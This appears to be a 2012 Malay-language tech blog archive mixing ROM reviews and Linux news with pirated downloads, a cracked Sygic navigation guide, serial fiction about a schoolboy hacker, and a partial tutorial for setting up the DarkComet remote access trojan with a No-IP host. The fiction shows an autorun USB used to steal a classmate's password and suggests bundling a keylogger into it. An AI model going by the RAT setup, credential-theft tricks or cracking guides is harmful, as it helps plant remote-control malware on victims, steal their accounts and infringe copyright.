31 May 2012

InsertCoin Evolution 6.3.1 [ROM For HTC One X] Review


Insert the coin!


Sebelum ini saya telah memakai CyanogenMod 9 pada HTC One X. Tak sampai dua hari saya sudah tidak tahan lagi dengan bateri yang begitu cepat sekali kadar penurunan kuasanya. Maaf developers/chefs, bukan sengaja mahu membuat perbandingan. Tetapi hanya menyatakan kebenaran. Tambahan pula Beats Audio tiada pada CM9! Mana boleh tahan!

Jadi saya flash pula InsertCoin setelah beberapa hari membelek forum xda-developers dan membaca reviu dari para pengguna. Woahaa! Super awesome! Terdapat InsertCoin Tweak yang boleh mengubah beberapa tetapan umum seperti bateri, jam, dan beberapa tetapan lain yang lebih kedepan (advance).

Selain itu prestasi bateri juga agak cemerlang. Setelah melakukan kalibrasi dengan baik, saya dapati dalam waktu 7 Jam 40 minit 8 jam, bateri masih berbaki 94%. Ini menunjukkan kadar penurunan kuasa yang sangat perlahan! Tak lupa juga Beats Audio yang dapat berfungsi dengan cemerlang selain kesemua bloatware telah dibuang secara default.

Anda boleh tonton video di bawah untuk review penuh dan gambaran kasar/umum mengenai ROM ini:

Koffin Kanser - Positive Full Album Download


If you're a big fan of Aru and Koffin Kanser, you should know about this album. It was launched in 2003 and has 12 tracks in it.


My favorite song is Perjalanan (Tribute to Sweet Charity). You can hear it below via the widget provided:I really hope that if you can find this album anywhere in the market, please don't hesitate to buy it! It is very rare and a good collection. Support our local underground artist even if the band was R.I.P.

Download section:

1. Jumbofiles
2. Mediafire
3. Minus
4. Adrive
5. Dropbox

Wallaweeyyy! Ape hal aku cakap inggelis plak ni! Hahaha! Apapun enjoy! Rare album ni der~!

Sygic GPS Data & Map Downloader v11.2.0 - 11.2.6


Anda menggunakan telefon bimbit pintar android dan ingin sekali mengembara? Mahukan perisian GPS yang unggul? Jangan bimbang. Sygic | GPS navigation adalah jawapan kepada keinginan anda.

Sygic ialah sebuah perisian pintar navigasi GPS dengan berpandukan kepada arahan bersuara. Sama seperti Garmin (yang biasa digunakan pada telefon bimbit Nokia), ia mempunyai peta yang akan disimpan pada memori telefon untuk kegunaan luar talian (offline).

Di sini saya ingin kongsikan sebuah perisian yang dapat memuat turun data dan peta secara percuma [Full Version Original]. Ssssyyyhhh...jangan bagitau dengan developers ok!Apa yang perlu anda lakukan ialah muat turun fail:

1. Fail pemasang (installer) Sygic .apk. Contohnya saya gunakan versi terbaru iaitu 11.2.6. Anda boleh dapatkannya di sini : sygic_navigator_11_2_6.apk

2. Fail GPS Data and Map Downloader : aura_mapdownloader_1120to1126.rar

3. Jalankan fail GPS Data and Map Downloader. Anda akan dapat lihat paparan skrin seperti no 1 di atas. Klik pada Android.

4. Klik pada Download base files dan pilih peta negara Malaysia. Kalau anda sedang bermastautin di Zimbabwe, pandai-pandai la cari sendiri hoh!

5. Tunggu sehingga kesemua fail selesai dimuat turun. Pergi kepada direktori anda muat turun fail tersebut. Saya sarankan ubah direktori pada desktop supaya senang untuk dicari. Di situ anda akan mendapat satu folder dengan nama 'Aura'. Salin ia ke dalam SD card telefon bimbit anda. Jangan lupa juga salin fail pemasang (pada step 1) itu tadi.

6. Buka telefon bimbit anda dan jalankan fail .apk itu memasang Sygic.

7. Apabila telah selesai pemasangan, akan muncul dua pintasan (shortcut) iaitu Sygic dan Sygic Downloader. Jalankan Sygic Downloader terlebih dahulu. Sila pastikan anda mempunyai sambungan ke internet. Ia akan memuat turun data yang kecil untuk mengesahkan peta dan data anda. Jika tidak berlaku apa-apa pun jangan bimbang, jangan menangis, dan jika terdapat arahan untuk memadamkan peta serta data, jangan lakukan!

8. Sekarang keluar dari Sygic Downloader dan jalankan Sygic. You're good to go!

Hybryde Evolution 12.04 : Hybrid Linux Operating System!


Seringkali kita mendengar sistem operasi Linux yang mempunyai pelbagai pilihan persekitaran desktop seperti KDE, MATE, Unity, Gnome Shell, XFCE, Openbox, LXDE dan sebagainya. Setiap kali selepas selesai memasang persekitaran desktop yang disukai dan kemudian ingin bertukar kepadanya, pengguna perlu terlebih dahulu log keluar dan log masuk balik dengan memilih persekitaran desktop tersebut. Bagaimana jika saya katakan hanya melalui satu menu pilihan, anda dapat bertukar desktop kegemaran dengan cepat tanpa perlu log keluar terlebih dahulu?

Ini dapat dilakukan melalui sistem operasi Hybryde Evolution 12.04, sebuah distro berasaskan Ubuntu (12.04 LTS) yang telah dimodifikasi sehingga dapat menjalankan pelbagai persekitaran desktop tanpa perlu log keluar melalui menu yang digelarkan sebagai Hy-menu.
Sistem operasi ini adalah dalam bahasa Perancis, namun anda dapat menukarnya kepada bahasa Inggeris dengan mudah. Hanya perlu ikut tutorial ini : Change the User Interface Language in Ubuntu

Berminat setelah melihat video di atas? Anda boleh muat turun fail ISO sistem operasi ini pada laman web rasminya di sini : Hybryde Linux Distribution

Tips : Untuk memudahkan anda 'memahami' bahasa Perancis pada laman webnya, sila gunakan Chrome yang mempunyai penterjemahan terbina dalam.

30 May 2012

Pasang Beats Audio Pada Mana-Mana Android Smartphone


Assalamualaikum.

Lama sungguh rasanya saya tidak mengemaskini pos di sini kerana sibuk dengan tugasan kerja yang memerlukan saya 'merantau' ke negeri lain. Setelah sekian lama jari ini tidak menaip untuk blog, terasa pula banyak benda yang telah saya ketinggalan untuk kongsikan bersama. Jadi hari ini saya akan kongsikan bagaimana anda boleh pasangkan Beats Audio pada mana-mana smartphone yang dikuasakan oleh Android.

Penafian: Dengan melakukan pemasangan ini saya menganggap anda sudah jelas dan faham mengenai sistem Android. Jika sesuatu berlaku saya dan mana-mana pihak yang terlibat dalam tutorial ini tidak akan bertanggungjawab terhadapnya.]


Anda boleh tonton video di bawah dan kuatkan volume jika tidak jelas:Atau boleh juga tonton video ini:
Kaedahnya mudah:
1. Muat turun fail zip Beats Audio (Pautan akan diberikan di bawah pada muat turun)
2. Reboot, pergi kepada ClockworkMod Recovery dan pilih 'Install zip from sdcard'.
3. Navigasi ke fail zip tersebut lalu pasangkannya.
4. Reboot.
5. Enjoy!

P/S : Jangan lupa buat sandaran (Nandroid Backup) terlebih dahulu sebelum melakukan pemasangan.

Pautan Rujukan:

1. (MOD)Beats Audio(2.3+up)05/06/12 (xda developers)
2. Get Beats Audio on your non-HTC Android phone

Muat Turun Beats Audio:

1. BeatsAudio5.1.zip
2. BeatsAudio5.1(SGS2).zip

28 May 2012

[Giveaway] CyberLink PhotoDirector 2011 Full Version (UK Only)Assalamualaikum dan Selamat sejahtera..

WHAT'S NEW IN PHOTODIRECTOR 3

PhotoDirector 3 menambah peningkatan keseluruhan untuk membetulkan warna dan kontras...Dan sekarang, anda boleh menikmati ciri-ciri penyuntingan dengan tepat dan satu set lengkap untuk mencantikkan alat dengan sokongan imej profesional 16-bit...PhotoDirector memberikan anda ciri-ciri baru yang menarik bagi setiap langkah dalam hasil kerja anda!..

Photo Director mempunyai ciri-ciri yang baru dan menarik seperti:
Giveaway:
1.Giveaway ini berasal dari UK,tapi kenalah ip dari UK..http://photodirector.disc.pcpro.co.uk/ register dahulu..Dan sikmati Cyberlink PhotoDirector 2011 full version..

26 May 2012

Hackim Si Penggodam - Episod 13 (Kisah Silam 2)


Assalamu'alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

EPISOD KETIGA BELASEncik Arif : Tetapi Retsam12345 telah menghilangkan diri. Dia telah menghilangkan diri semasa beliau pergi ke tandas. Mr. Hac sebenarnya sudah mengetahui perkara ini akan berlaku kerana sikap Retsam12345 yang begitu berubah sejak akhir-akhir itu. Di sebabkan itu, Mr. Hac telah menukar password akaun yang mempunyai sejumlah wang dari bank yang telah di ceroboh itu semasa mereka hendak keluar dari bank tersebut. Perkara itu tidak disedari oleh Retsam12345.

Dan pada keesokannya, Mr. Hac pergi ke bank tersebut dan menyatakan kepada pihak bank bahawa bank tersebut mudah untuk dicerobohi dan komputer mereka mudah digodam. Mr.Hac telah menerangkan beberapa langkah bagi mengelakkan perkara sedemikian berlaku. Mereka menerima kelemahan mereka dan menghargai kesudian kami untuk menguji sekuriti bank mereka. Berbalik semula kepada Retsam12345 ini, mengikut kepada panggilan yang dilakukan oleh Retsam12345, dia telah membuat panggilan ke satu nombor yang tidak diketahui, pada setiap hari terutamanya pada malam hari. Kami cuba untuk trace siapakah orang itu, tetapi tidak berjaya.

Sejak Retsam12345 itu menghilangkan diri, terdapat pelbagai jenayah siber yang telah berlaku di luar sana, terutamanya penggodaman kad kredit dan laman web. Kami seperti sudah mengesyaki bahawa di antara jenayah siber itu, pasti Retsam12345 antara penggodam yang melakukannya. Jadi Mr.Hac bekerjasama dengan pihak bank untuk menangkap Retsam12345. Tujuan Mr.Hac untuk mengetahui punca Retsam12345 meninggalkan kumpulan mereka dan adakah dia telah dipengaruhi oleh seseorang? Semasa dalam proses untuk menangkap Retsam12345, kami telah mengetahui siapakah orang yang selalu di telefon oleh Retsam12345. Orang itu adalah kawan rapat Mr.Hac sebelum mereka berdua ditangkap kerana melakukan jenayah siber suatu ketika dulu. Namanya Janjangz. Dia memang expert bab-bab godam laman web. Jadi Mr.Hac mengesyaki bahawa Janjangz telah mempengaruhi Retsam12345 untuk bersama dengannya melakukan aktiviti penggodaman. Mr.Hac tahu bahawa sukar untuk menangkap Retsam12345 jika dia telah bekerjasama dengan Janjangz. Jadi Mr.Hac telah menggunakan kepakaran dirinya untuk menggodam sistem telefon dan trace kedudukan Retsam12345 dan Janjangz semasa mereka berhubung. Tetapi tidak juga berjaya.

Ini menyebabkan kami terpaksan meminta pertolongan dari hacker-hacker yang lain untuk menangkap mereka berdua. Dan dalam masa lebih kurang sebulan, kami telah berjaya menangkapnya. Sebelum kami menghantarnya kepada pihak berkuasa, Mr.Hac telah bertanya kepada Janjangz, kenapa dia telah mengajak Retsam123345 untuk menyertai ideologi jahatnya itu? Janjangz hanya menjawab bahawa dia hanya ingin membalas dendam terhadap Mr.Hac kerana tidak dikenakan hukuman yang setimpal semasa disabitkan kesalahan jenayah siber. Jadi itulah punca semua ini berlaku. Retsam12345 yang masih muda mudah dipengaruhi oleh Janjangz. Oleh itu, mereka berdua telah dihantar ke pihak berkuasa untuk mengikut prosedur yang seterusnya.

Sejak dari peristiwa itu, Mr.Hac membubarkan kumpulan itu, padanya lebih baik kelebihan,kemahiran dan pengalaman yang ada pada kami semua ini digunakan oleh pihak berkuasa untuk menangkap penggodam diluar sana dan menolong mereka yang buta sekuriti. Disebabkan itu aku telah bekerja di syarikat ejen perisik, untuk membantu mereka dengan menggunakan kemahiran yang aku ada iaitu mengintip dan social engineering. Pr67am pula telah bekerja dengan syarikat antivirus terkemuka. Analyzer Programmer pula telah bekerja dengan Mr.Hac dengan membuka syarikat komputer mereka sendiri. Setakat ini mereka berdua telah mencipta sistem operasi mereka sendiri, software yang selalu digunakan oleh hacker juga dicipta untuk digunakan oleh penetration tester atau syarikat-syarikat yang mementingkan sekuriti. Jadi sejak itu kami membuat haluan masing-masing.

Sekarang ni.. Kenapa Retsam12345 cari kau? Pada aku mungkin dia mahu pengaruh kau seperti dia telah dipengaruh oleh Janjangz. Memandangkan dia sudah berada di luar sana, aku mahu kau sentiasa perhatikan keadaan sekeliling. Jikalau ada apa-apa yang mencurigakan, contact je aku. Faham? Dia mesti ada agenda tersendiri untuk merekrut kau sebagai ahli dia.

Hackim : Baiklah. Saya faham Encik Arif. Saya akan lebih berhati-hati lepas ini.


Hackim pun pun meletakkan telefon bimbitnya di sebelah komputer dan terus googling mengenai Retsam12345. Dia ingin mengetahui sejarah Retsam12345. Tetapi Hackim tidak dapat menggunakan komputer itu pada masa yang lama kerana keesokkannya adalah hari sekolah. Dia pun terpaksa shutdown komputernya dan terus baring diatas katil untuk tidur...

Kini kita ketahui siapakah Retsam12345 ini sebenarnya. Jadi bagaimanakah Retsam12345 ini mempengaruhi Hackim? Adakah dia akan terpengaruh? Kita tunggu untuk episod yang seterusnya.

p/s : Hehe. Maaf ye lambat update. ^^

Hackim Si Penggodam - Episod 1 (Introduction)
Hackim Si Penggodam - Episod 2 (Hacking Wifi WEP/WPA)
Hackim Si Penggodam - Episod 3 (Tujuan Yang Jelas)
Hackim Si Penggodam - Episod 4 (Social Engineering)
Hackim Si Penggodam - Episod 5 (Kuala Lumpur)
Hackim Si Penggodam - Episod 6 (Operating System For PenTest)
Hackim Si Penggodam - Episod 7 (Tip-Tip Social Engineering)
Hackim Si Penggodam - Episod 8 (Second Mission Started)
Hackim Si Penggodam - Episod 9 (ZestCool - Mangsa Pertama)
Hackim Si Penggodam - Episod 10 (Hack Windows 7 Password)
Hackim Si Penggodam - Episod 11 (Autorun)
Hackim Si Penggodam - Episod 12 (Kisah Silam)

Sekian.

25 May 2012

Pinguy OS 12.04 Beta Dilepaskan


Beberapa hari lepas saya ada menulis mengenai Linux Mint 13 'Maya' RC yang telah dilepaskan kepada umum. Untuk pengetahuan anda, bagi menjimatkan masa (yang sebenarnya saya malas nak tulis pos baru), suka untuk saya umumkan bahawa Linux Mint 13 Maya rilisan stabil telah pun dilepaskan kepada umum. Ia mempunyai dua versi iaitu menggunakan MATE Desktop atau Cinnamon.

Linux Mint 13 Maya boleh dimuat turun di sini : Linux Mint Download Page

Baiklah. Kita beralih pula kepada tajuk pos. Pinguy OS, yang dahulunya melepaskan rilisan 11.10 dalam versi 'separuh siap', kini melepaskan versi terbaru iaitu 12.04 rilisan Beta. Disebabkan Gnome Shell sudah dikatakan mencapai proses kematangan, maka rilisan terbaru ini bakal mempunyai rilisan stabil.


Tidak banyak yang dapat diperkatakan mengenai rilisan ini kerana ia masih menggunakan layout dari versi 11.10. Jadi anda boleh membaca mengenai rilisan ini di sini.

Anda boleh muat turun Pinguy OS 12.04 Beta pada pautan ini : Pinguy OS Blog

Voyager : Distro Linux Dari Perancis


Sudah lama tidak mencari distro baru yang tidak memeningkan kepada seperti Pinguy OS, baru-baru ini tergerak hati untuk mencarinya di serata Google, dan akhirnya terjumpalah dengan Voyager, sebuah distro yang sesuai untuk pemula dari Perancis.


Ia dilengkapi dengan tweak-tweak yang awesome, dan menggunakan Xubuntu sebagai asas atau tapak kepada distro ini. Xubuntu mempunyai menu seakan klasik, yang memudahkan pengguna baru untuk meneroka, selain dilengkapi dengan AWN launcher. Tak lupa juga pembangun telah memasukkan Conky Control, yang mana memudahkan pengguna baru untuk menukar pattern Conky yang disukai dengan mudah sekali.

Selain itu, ia dilengkapi dengan pelbagai perisian yang telah dipasang secara lalai (default) dan ini semestinya tidak akan memeningkan kepada jika anda tidak mahu lagi memasang sebuah distro dan kemudian terpaksa pula memasang perisian-perisian yang lain, yang akan menjamah dengan rakus masa anda yang berharga.

Berikut merupakan video pengenalan kepada Voyager 12.04 LTS:
Untuk pengetahuan anda, Voyager 12.10 berasaskan Ubuntu Quantal Quetzal sedang giat dibangunkan. Mainkan video di bawah yang merupakan pra-tonton kepada versi tersebut:Bagaimana? Tertarik dengan fungsi dan kecantikannya? Anda boleh muat turun dan membaca dengan lebih terperinci mengenai Voyager 12.04 pada laman rasmi pembangunnya di sini : Voyager

Setup Darkcomet And Setting port dengan betul


Assalamualaikum dan selamat sejahtera..


Hari ini semua tertunggu-tunggu luqman nak wat RAT..Maaf la toturial ni tak bapa lengkap sikit sebab luqman bukan pakai wifi,lukman pakai berukband..Kalau sesiapa yang pakai berukband kena beli vpn di Sini dulu baru la setting port tu success..Tengok gambar di bawah..
OK..kita mulakan dengan doa pagi ni..


Bahan yang perlu ada adalah:


1.Darkcomet                    :http://www.darkcomet-rat.com/
2.DUC 3.0 (no-ip.com) :http://www.no-ip.com/downloads.php?page=win

1.Mulakan langkah dengan pergi  http://www.No-IP.com  dan Register...Kalau sudah ada akaun, log in jer...
2. Kemudian, klik "Add Host"
3. Seterusnya, tetapkan “host name” tuuu...


Hostname : Your Host Name, EG: Host Type: DNS Host (A)

Kemudian, klik jer "Create Host" kat bawah kanan tu...

Ok, host telah pun siap!!! Baru siap step pertama...
Kemudian, mari kita ke No-IP Client plak... Bereh blaka tu...


STEP KEDUA :

1. No-IP Client tu, download, extract ke dekstop, kemudian install...
2. Selepas install, buka, Log In dengan No-ip Username & Password anda...
3. Apabila Log In tu, klik "Select Hosts" kemudian Check That Little Box dengan Hostname anda tadi...


Sampai di situ sahaja luqman leh tunjuk..kalau luqman pakai berukband boleh la tunjuk sampai habis..Video toturial ini dibuat oleh Masta RAt theatregelap..Dia yang banyak bantu luqman beli vpn di atas..Anda boleh rujuk blog nya di http://www.theatregelap.com...


Video toturial download di Sini..Credit to Masta theatregelap..


23 May 2012

Permainan 3D Ubisoft : From Dust Kini Boleh Dimainkan Di Linux


Bagi kipas-susah-mati permainan 3D, From Dust adalah pilihan yang sangat tepat untuk memenuhi waktu lapang. Ia dipenuhi dengan grafik yang superb, dan kepermainan bertaraf 5/5 bintang.


Berita baik buat semua pengguna sistem operasi Linux, permainan 3D ini kini boleh dimainkan pada sistem operasi anda hanya dengan menggunakan pelayar web Google Chrome.

Dalam permainan ini, anda bertindak sebagai 'pengawal' alam yang mampu mengawal kesemua elemen untuk memastikan kelangsungan hidup kaum/puak anda.
Anda boleh muat turun From Dust melalui Chrome Web Store. Jalankan permainan ini dan tunggu sehingga ia siap memuat turun data permainan.

Untuk menjalankan ia pada Chrome dengan baik, sila pastikan:

1. Native Client = Enable -> pada chrome://flags

2. Taipkan chrome://gpu pada URL baru Chrome, dan jika anda dapat melihat WebGL atau Compositing diwarnakan dengan warna merah pada Graphics Feature Status, sila taipkan chrome://flags pada URL bar Chrome, dan Enable pada pilihan Override software rendering list.

Linux Mint 13 'Maya' RC Dilepaskan


Setelah lama menanti kelahiran terbaru distro berasaskan Ubuntu ini, akhirnya ia dilepaskan juga dengan versi terbaru, versi 13 lepasan RC. Distro yang dimaksudkan itu ialah Linux Mint, dan kini ia dibina berasaskan kepada Ubuntu 12.04 Precise Pangolin.

Apa yang terbaru dalam rilisan ini?

MATE 1.2


Cinnamon 1.4


MDM (Display Manager)Anda boleh baca keseluruhan nota rilisan di sini : New features in Linux Mint 13

Berikut adalah reviu dari Infinite Galactic:
Muat turun Linux Mint 13 Maya di sini : Linux Mint 13 'Maya'

19 May 2012

Hackim Si Penggodam - Episod 12 (Kisah Silam)


Assalamu'alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

EPISOD KEDUA BELASPada satu malam, Hackim baru teringat untuk membuat panggilan pada Encik Arif bagi memberitahu akan perkembangan misi keduanya itu. Dia pun mencapai telefonnya dan mendail no Encik Arif.

Hackim : Assalamualaikum Encik Arif.

Encik Arif : Waalaikumussalam Hackim.

Hackim : Ni saya nak bagitahu akan perkembangan saya mengenai misi kedua ini. Perkembangannya adalah.. (Anda boleh lihat perkembangannya pada Hackim Si Penggodam - Episod 9 (ZestCool - Mangsa Pertama) dan Hackim Si Penggodam - Episod 11 (Autorun) )

Encik Arif : Ohh. Baguslah tu. Yang untuk kawan kamu lagi seorang tu, siapa nama? Yang Dragon-dragon tu.

Hackim : Bluedragon.. Encik Ariff.

Encik Arif : Tak kisah la apa nama dia. Cuba kau buat satu fail autorun yang boleh menjalankan satu program yang dia minat. Dalam program tu kau cantumkan dengan keylogger. Sebab aku pernah buat benda ni, dan menjadi.

Hackim : Oh ye ke? Okay-okay. Saya akan buat nanti. Em. Sebelum tu, saya nak tanya ni. Masa tu saya ada main komputer, bila nak shutdown komputer tu ada satu pop up keluar. Saya dah tak ingat dia tulis apa. Tak silap saya "YOU HAVE BEEN HACKED BY RETSAM12345." dengan "STAY AWAY FROM ARIF. HAHAHA". Lebih kurang macam tu laa. Encik Ariff kenal tak siapa?

Encik Arif : Retsam12345? Kau biar betul?? Dia hack kau ke?

Hackim : Aah. Dia hack dan nama dia memang macam tu.

Encik Arif : Aduh. Bahaya ni. Nampaknya aku kena bagitahu kau siapa dia ni. Macam ni, aku dulu ada satu team hacker, kami tak ada nama pun untuk team itu. Ada 5 orang anggota. Kesemuanya ada rekod jenayah siber. Yang pertama adalah Mr.Hac, dia ni ketua kumpulan kitorang. Dia merupakan orang penting dalam menubuhkan kumpulan ini. Yang kedua adalah pr67am. Dia adalah orang yang cekap dalam membuat virus. Yang ketiga adalah Analyzer Programmer. Dia ni pakar dalam programming. Yang keempat adalah Retsam12345. Dia ni pakar dalam godam komputer. Dan aku akhir sekali. Kumpulan ini sebenarnya ditubuhkan secara tidak sengaja. Kerana kami semua berjumpa dalam satu perjumpaan underground yang dihadiri oleh semua hacker-hacker. Semasa berborak, Mr.Hac meluahkan pendapatnya untuk menubuhkan satu kumpulan yang terdiri daripada kami berlima. Kerana dia merasakan kami berempat mempunyai kemahiran yang secukupnya untuk membuat satu team hacker yang lengkap. Dan Mr.Hac ni boleh di kira hardcore hacker kerana kemahiran dia mengatasi kami semua. Jadi dia memang layak menjadi ketua kami. Kami semua pun bersetuju untuk menubuhkan kumpulan ini. Aktiviti hacking kami pun bermula.. Dan kami ini bukannya Black hat hacker. Kami ni grey hat hacker. Kami buat mengikut kepada keperluan. Jadi secara jujurnya kami telah berjaya membantu banyak syarikat dalam memperkasakan sekuriti website mereka, bangunan mereka dan sebagainya. Kami membuat ini sekadar suka-suka. Jika ada yang memberi habuan, kami terima seadanya. Semakin lama, semakin ramai yang mengenali kami kerana aktiviti hacking kami sudah diketahui ramai. Ada yang menentang dan ada juga yang menyokong. Bagi kami, itu semua lumrah. Kerana kami tidak buat salah, kami hanya membantu mereka yang memerlukan bantuan. Emm. Banyak jugalah yang aku pelajari dari diorang semua ni. Memang ilmu diorang ni kalau jatuh ke tangan orang yang salah, memang habis laa. Hendak dijadikan cerita, pada suatu hari, kami pun bercadang untuk menggodam satu bank ini dengan memecah masuk bank tersebut tanpa di kesan oleh orang lain. Pada mulanya aku menyamar sebagai pekerja dari syarikat lain yang tergesa-gesa untuk memberikan satu dokumen kepada salah seorang dari pekerja bank tersebut. Macam biasalah, aku dah buat kajian tentang bank ni, jadi senang jelah aku lepas dari pengawal-pengawal yang bertugas dengan menggunakan teknik social engineering. Dah masuk, aku pergi ke satu tempat dimana semua suis dalam bangunan itu berkumpul pada satu tempat. Jadi aku menghidupkan suis penggera pada tingkat dua, kerana komputer yang ingin kami godam itu berada pada tingkat 6. Penggera tersebut telah menyebabkan semua pengawal yang bertugas pergi ke tingkat dua untuk melihat apa yang terjadi. Aku pun dengan cepatnya keluar dari situ dan terus pergi ke pintu belakang untuk memberi ruang kepada Mr.Hac dan Retsam12345 untuk pergi ke tingkat enam. Mereka pun masuk ke tingkat enam dan mencari komputer yang mempunyai akses untuk ke sistem utama, dan berjaya. Mereka telah memindahkan sejulah duit ke dalam satu akaun dengan menggunakan komputer tersebut. Kemudian padamkan segala maklumat yang boleh menyebabkan mereka di berkas. Setelah aku mengetahui mereka berjaya, aku pun menjerit kuat-kuat supaya dapat menarik perhatian pengawal. Tujuannya supaya Mr.Hac dan Retsam12345 dapat keluar dari bangunan bank tersebut dengan selamat. Pengawal pun datang kepada aku, aku pun cakap yang aku ada nampak hantu. Pengawal tu pun gelak. Aku tak kisah pun diorang nak gelak, janji kawan-kawan aku tu terlepas. Kemudian pengawal itu membawa aku keluar dari bank tu. Pada masa dan ketika itu, aku bersasa sangat lega kerana dapat menjayakan misi ini. Kami pun berjumpa di tempat yang telah ditetapkan sekiranya berjaya dalam misi tersebut. Tetapi...(diam seketika)

Hackim : Tetapi apa Encik Arif?
Apakah yang ingin dicakapkan oleh Encik Arif sebenarnya? Sama-samalah kita tunggu untuk episod yang seterusnya.

Hackim Si Penggodam - Episod 1 (Introduction)
Hackim Si Penggodam - Episod 2 (Hacking Wifi WEP/WPA)
Hackim Si Penggodam - Episod 3 (Tujuan Yang Jelas)
Hackim Si Penggodam - Episod 4 (Social Engineering)
Hackim Si Penggodam - Episod 5 (Kuala Lumpur)
Hackim Si Penggodam - Episod 6 (Operating System For PenTest)
Hackim Si Penggodam - Episod 7 (Tip-Tip Social Engineering)
Hackim Si Penggodam - Episod 8 (Second Mission Started)
Hackim Si Penggodam - Episod 9 (ZestCool - Mangsa Pertama)
Hackim Si Penggodam - Episod 10 (Hack Windows 7 Password)
Hackim Si Penggodam - Episod 11 (Autorun)

Sekian.

Hackim Si Penggodam - Episod 11 (Autorun)


Assalamu'alaikum Dan Selamat Sejahtera Para Pembaca OMG! Hackers?

EPISOD KESEBELAS

Pada suatu petang, selepas habis sesi persekolahan, Hackim pergi ke cyber cafe untuk menggunakan internet kerana di rumahnya tiada elektrik. Tujuannya untuk mencari bahan-bahan rujukan ilmiah untuk kerja kursusnya. Setelah duduk di komputer, dia terperasan seseorang yang begitu "familiar" dengan matanya, dia pun cuba melihat siapakah orang itu. Rupa-rupanya Bluedragon! Dia sedang bermain Permainan RTS 0 A.D. Alpha 10 Jhelum pada ketika itu.

"Laa. Engkau rupanya Bluedragon. Tak habis-habis dengan game kau tu. Tapi... Bagus juga dia ada kat sini, boleh la aku tengok apa yang dia buat. Hehe. Okay, sekarang ni aku siapkan kerja aku dulu, lepas tu baru kacau dia. Harap-harap dia main lama sikit."


Hackim pun buatlah kerjanya sampai siap. Dan dia pun masukkan segala bahannya dalam pendrive miliknya. Semasa dia memegang pendrive, dia perasan sesuatu...

"Huh.. Siap pun kerja ni. Okay la. Aku nak pergi kacau si Bluedragon tu. Haha. Eh? Kejap.. Aku rasa aku macam tahu sesuatu."


Kemudian Hackim pun buka semula internet dan mencari beberapa maklumat yang dia inginkan. Dan dari situ dia memepelajari sesuatu. Kerana dia pernah terlihat satu artikel yang berkaitan penyebaran virus menggunakan usb pendrive. Di bawah ini adalah antara artikel-artikel yang di baca oleh Hackim :

Itulah artikel-artikel yang di baca oleh Hackim, dari cara melakukannya hinggalah cara untuk mempertahankannya. Kemudian dia muat turun segala program yang terdapat dalam artikel tersebut dan cuba praktikkannya. Dan menjadi! Kerana komputer di cyber cafe tersebut tidak mempunyai anti-virus, jadi senang untuk program tersebut autorun. Sekarang ni dia sedang memikirkan sesuatu, bagaimana untuk dapatkan email dan password Bluedragon ni.

"Emm. Aku nak buat macam mana eh? Dah la Bluedragon ni pandai. Takkan la tiba-tiba aku nak cucuk usb tu kat cpu dia. Kantoi la aku. Kejap! Aku rasa aku tahu.."


Hackim pun pergi ke Bluedragon dan berborak dengannya. Social engineering Hackim bermula!!

Hackim : Weh! Kau buat apa kat sini?

Bluedragon : Eh? Kau Hackim. Ingatkan siapalah tadi. Aku tengah main masak-masak je. Hahaha. Of course la aku main komputer! Itu pun mahu tanya lagi ke? Kau pula buat apa kat sini? Jarang nampak kau kat cc (cyber cafe) ni.

Hackim : Haha. Aku datang sini main masak-masak juga. Hehe. Gurau je. Aku datang sini sebab elektrik kat rumah aku tak ada. Cikgu sejarahkan suruh buat kerja kursus. Jadi aku cari bahan-bahan kat internet la. Cikgu kau tak ada suruh buat kerja kursus ke?

Bluedragon : Ohh. Ada. Alaa. Rilek sudah. Benda ni kita cuma kena buat dua benda je iaitu Ctrl+C dengan Ctrl+V. Lepas tu siaplah. Hahaha. Tajuk kau apa?

Hackim : Haha. Kau ni memang pemalas betullah. Aku punya tajuk Bangunan Bersejarah Di Malaysia. Kau?

Bluedragon : Emm. Nampaknya kita ada jodoh. Haha. Aku punya pun sama juga. Kalau macam tu bagi aku tengok bahan-bahan kau tu.

Hackim berjaya untuk peringkat pertama!

Hackim : Boleh. Kejap aku cucuk pendrive ni dekat kau punya cpu. Okay.. Dah. Buka la.

Bluedragon : Banyak juga bahan-bahan yang kau cari ni. Nanti dah siap bagi aku tau. Lagipun cikgu kita lainkan. Hehe.

Hackim : Ikut suka kau lah Bluedragon. Aku tak kisah pun.


Setelah Bluedragon melihat semua bahan-bahan itu, dia pun suruh Hackim cabut semula kerana dia nak teruskan main permainannya itu. Hackim pun menurut saja apa yang di suruh oleh Bluedragon. Dengan hati yang gembira Hackim pulang kerumah.

Pada malamnya, setelah bekalan elektrik rumahnya ada semula, Hackim pun buka fail-fail yang mengandungi password Bluedragon, tetapi tidak satu pun ada. Hal ini kerana Bluedragon telah clearkan semua password dan email setelah logout dari akaunnya. Dia sememangnya orang yang berhati-hati. Hackim seperti sudah agak perkara ini akan berlaku. Dia tahu, setiap apa yang dia lakukan tak semestinya akan berjaya, jadi dia perlu cari cara lain untuk mendapatkan password dan email Bluedragon.

"Memang Bluedragon ni jenis yang berhati-hati. Tak apa, ada banyak cara lagi aku boleh buat. Lagipun setiap hari jumpa dia. Kalau nak "kena" kan dia guna telefon pun boleh. Tengok la keadaan macam mana nanti. Tapi yang autorun tu mungkin aku kena ubah sikit cara nak dapatkan password dengan email dia tu. Nanti tengoklah kat dalam internet lagi pasal autorun ni."


Itulah Hackim. Dia tidak putus asa dalam mencapai apa yang dikehendakinya. Dia tahu, ada banyak cara yang boleh di gunakan lagi. Yang penting, kena pandai cari peluang dan ruang! Okay. Kita tunggu ke episod yang seterusnya!

p/s : Fokus saya kat sini adalah cuba lihat artikel yang saya senaraikan di atas. Kerana ianya amat berguna. Kalau ada idea yang bernas atau apa saja idea yang anda ingin berikan, sila komen di bawah. Sokongan anda amatlah di hargai. =)

Hackim Si Penggodam - Episod 1 (Introduction)
Hackim Si Penggodam - Episod 2 (Hacking Wifi WEP/WPA)
Hackim Si Penggodam - Episod 3 (Tujuan Yang Jelas)
Hackim Si Penggodam - Episod 4 (Social Engineering)
Hackim Si Penggodam - Episod 5 (Kuala Lumpur)
Hackim Si Penggodam - Episod 6 (Operating System For PenTest)
Hackim Si Penggodam - Episod 7 (Tip-Tip Social Engineering)
Hackim Si Penggodam - Episod 8 (Second Mission Started)
Hackim Si Penggodam - Episod 9 (ZestCool - Mangsa Pertama)
Hackim Si Penggodam - Episod 10 (Hack Windows 7 Password)

Sekian.

18 May 2012

Hackim Si Penggodam - Episod 10 (Hack Windows 7 Password)


